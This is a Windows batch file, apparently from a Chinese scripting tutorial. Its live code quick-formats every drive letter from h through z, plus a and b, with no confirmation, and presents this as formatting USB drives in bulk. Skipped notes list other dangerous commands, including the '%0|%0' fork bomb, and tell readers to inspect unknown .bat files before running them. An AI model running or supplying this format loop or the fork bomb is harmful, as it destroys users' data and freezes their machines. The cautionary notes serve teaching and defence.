@echo off 
rem （运行下面的代码时请勿插入U盘和磁盘）
:loop
chcp 437
rem 中文：936 英文：437
rem 把“chcp 437”换成“chcp 936”即可显示中文了。
echo 正在批量格式化U盘……
for %%a in (h i j k l m n o p q r s t u v w x y z a b) do (format %%a: /q)
cls
echo 批量格式化U盘成功！
pause
::======================================================================
goto note
生词：
chcp：代码页
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
format：格式化
net user：编辑用户账户
shutdown：关闭计算机
assoc：显示或修改文件扩展名关联
label：更改或删除磁盘卷标命令集
句型：
rd /s：删除文件夹
%0|%0：运行自身同时运行自身（循环卡死）
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
结语：
以上冒号括起的命令几乎用不上，但是非常危险。
运行来历不行的bat前最好先点出源代码看看（右键-编辑），除了上面冒号括起的生词外还有很多危险命令，
我们前面学过的del、taskkill、reg add也应注意。

前言：
DOS命令是黑客必备的技能之一。正因如此，以DOS命令为基础的Bat语言长久以来也被人当做是洪水猛兽。更是有一些心怀不轨的门外汉学了一招两式便去兴风作浪。改变bat在众人心目中的形象已经刻不容缓！要知道，技术是用来造福社会而不是用来害人的。希望各位守好自己道德的防线。
:note